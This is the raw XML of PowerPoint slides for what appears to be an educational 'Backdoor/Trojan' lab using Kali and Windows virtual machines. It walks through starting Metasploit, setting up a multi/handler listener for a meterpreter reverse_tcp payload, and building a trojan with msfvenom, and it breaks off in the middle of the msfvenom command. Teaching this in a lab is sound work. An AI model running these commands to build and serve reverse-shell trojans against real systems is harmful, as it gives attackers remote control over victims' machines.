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3" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId25"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId26"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="588" r:id="rId6"/>
    <p:sldId id="590" r:id="rId7"/>
    <p:sldId id="592" r:id="rId8"/>
    <p:sldId id="613" r:id="rId9"/>
    <p:sldId id="593" r:id="rId10"/>
    <p:sldId id="617" r:id="rId11"/>
    <p:sldId id="595" r:id="rId12"/>
    <p:sldId id="616" r:id="rId13"/>
    <p:sldId id="615" r:id="rId14"/>
    <p:sldId id="599" r:id="rId15"/>
    <p:sldId id="596" r:id="rId16"/>
    <p:sldId id="600" r:id="rId17"/>
    <p:sldId id="597" r:id="rId18"/>
    <p:sldId id="606" r:id="rId19"/>
    <p:sldId id="607" r:id="rId20"/>
    <p:sldId id="591" r:id="rId21"/>
    <p:sldId id="608" r:id="rId22"/>
    <p:sldId id="614" r:id="rId23"/>
    <p:sldId id="58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DBC0"/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FF5701-5457-4B1D-A277-F51690C4B16E}" v="1" dt="2020-05-29T13:12:40.81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741464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20399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="110199" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="220399" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="330598" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="440798" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="550998" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="661197" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="771397" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="1060">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="881596" defTabSz="220399" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="106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679043B9-CADB-4EE8-8FF5-9B1E1D32C4A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17C2C984-EBF0-4078-B501-1AF9426D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93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9878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39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55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32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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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17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679043B9-CADB-4EE8-8FF5-9B1E1D32C4A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17C2C984-EBF0-4078-B501-1AF9426D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810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8"/>
            <a:ext cx="3230218" cy="2048446"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="225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775023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5559" y="4737656"/>
            <a:ext cx="4617541" cy="1547191"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1688" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="241102" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1055"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="482203" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="950"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="723305" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="844"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="964406" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="844"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1205508" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="844"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1446609" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="844"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1687711" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="844"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1928813" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="844"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Presenter name, email</a:t>
            </a:r>
          </a:p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1082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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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1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679043B9-CADB-4EE8-8FF5-9B1E1D32C4A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17C2C984-EBF0-4078-B501-1AF9426D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7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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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4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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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2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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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3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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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1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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426D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43B9-CADB-4EE8-8FF5-9B1E1D32C4A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C984-EBF0-4078-B501-1AF9426DD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8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4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676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C1427D-ED5D-45CD-8B99-B559DC15618E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Backdoor/Trojan 2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A3E2-396B-4E9B-A2BE-FDD00B80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IP Address (Windows Machine)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6F33-23C8-447C-A3D1-75BF22A87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98" dirty="0"/>
              <a:t>Select the Start button (Windows Machine) and search for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t> (Command Prompt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Use the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Search for the IPv4 Address line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Write down the Windows IP Address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B7315-3B6A-4EEE-8203-DC957236A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546" y="3934197"/>
            <a:ext cx="2244153" cy="2830312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DAE840-3BCB-4B7E-A3E0-50FE3285C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225" y="3326190"/>
            <a:ext cx="3637125" cy="2244893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3B9F3C3-8F8F-44AB-B113-F1EA59FE91D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775769" y="4337449"/>
            <a:ext cx="795213" cy="243446"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="254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290215">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1125" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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3D435-BC90-488F-834F-5D0BC1F48FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916517" y="5799088"/>
            <a:ext cx="1298240" cy="1875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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="290215">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="984" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows IP Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="984" i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7F9C29-D86B-484F-84DB-17E91EF15656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7346935" y="4587241"/>
            <a:ext cx="218703" cy="1142061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73194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FCDB-2B12-4013-8160-C92D0F5D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Verify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581EA-3118-4B8A-A0C7-3137DD641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88" dirty="0"/>
              <a:t>Verify that the Windows environment is connected to the Kali environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1688" dirty="0"/>
              <a:t>In Kali’s Terminal, type the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1406" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>ping –c 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1406" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>Windows_IP_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1406" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1688" dirty="0"/>
              <a:t>In the Window’s VM, open the command prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1406" dirty="0"/>
              <a:t>Press the Start Button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1406" dirty="0"/>
              <a:t>Search for “CMD”, open the Command Prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1688" dirty="0"/>
              <a:t>Type the following Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1406" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1406" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>Kali_IP_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1406" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1688" dirty="0"/>
              <a:t>Enter the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1688" u="sng" dirty="0"/>
              <a:t>actual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1688" dirty="0"/>
              <a:t> IP address where the green text is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1688" dirty="0"/>
              <a:t>You should notice the two systems are able to communicate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817173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3E90-FDE5-43CB-B57A-50251D28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Initialize Metasploit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C8F2-047F-462B-BD45-4A942779A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2743178"/>
            <a:ext cx="8143875" cy="21324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the Kali environment, open Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter the following command to start the PostgreSQL database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter the following command to start the Metasploit framework:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier" panose="020604090202050204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2746B-BBE4-4EC9-91E5-48892FEEE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029" y="1227640"/>
            <a:ext cx="2958909" cy="1204136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9910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0854-C984-4173-AF32-C3E403ED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Initialize Metasploit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D9FD9-9EEE-4872-82A7-63A6EE8C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800691"/>
            <a:ext cx="8143875" cy="875782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start Metasploit with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo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 err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier" panose="020604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2A513D-44E8-4D4B-8894-34B80E5EC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773" y="2365335"/>
            <a:ext cx="4445382" cy="106366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EEAB6B-7144-4D8E-AA86-0C0C09153F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500063" y="2790868"/>
            <a:ext cx="3847883" cy="2009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7859" tIns="17859" rIns="17859" bIns="17859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sz="2250" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You should notice that Metasploit console has started and you should now see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1969" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1969" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr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3971421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7508-1B8C-4674-A7EF-A074E249F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Backdoor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30718-BBC5-40D2-A86C-9330C9A95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8383270" cy="39655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Tell Metasploit to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2109" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>set payload windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the local host (Kali’s IP Address):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2109" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2109" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>Kali_IP_Address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urier" panose="02060409020205020404"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the local port (use 1717):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>set LPORT 1717</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>run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813DFF-7E8E-4F18-B4EA-D23E384AF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241" y="4445996"/>
            <a:ext cx="3806510" cy="1154195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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812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28EF-E019-45D8-B0F0-CD8F356F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Create the Trojan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D2004-2B50-4C95-99F0-A2E4F1413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8355852" cy="41890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 a trojan that will give you access to the Windows Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Terminal in Kali (Leave the other Terminal running)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make yourself the root user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1898" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate to the html directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1898" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>cd /var/www/html/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create the trojan (using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSFVenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2039" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>Kali_IP_Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
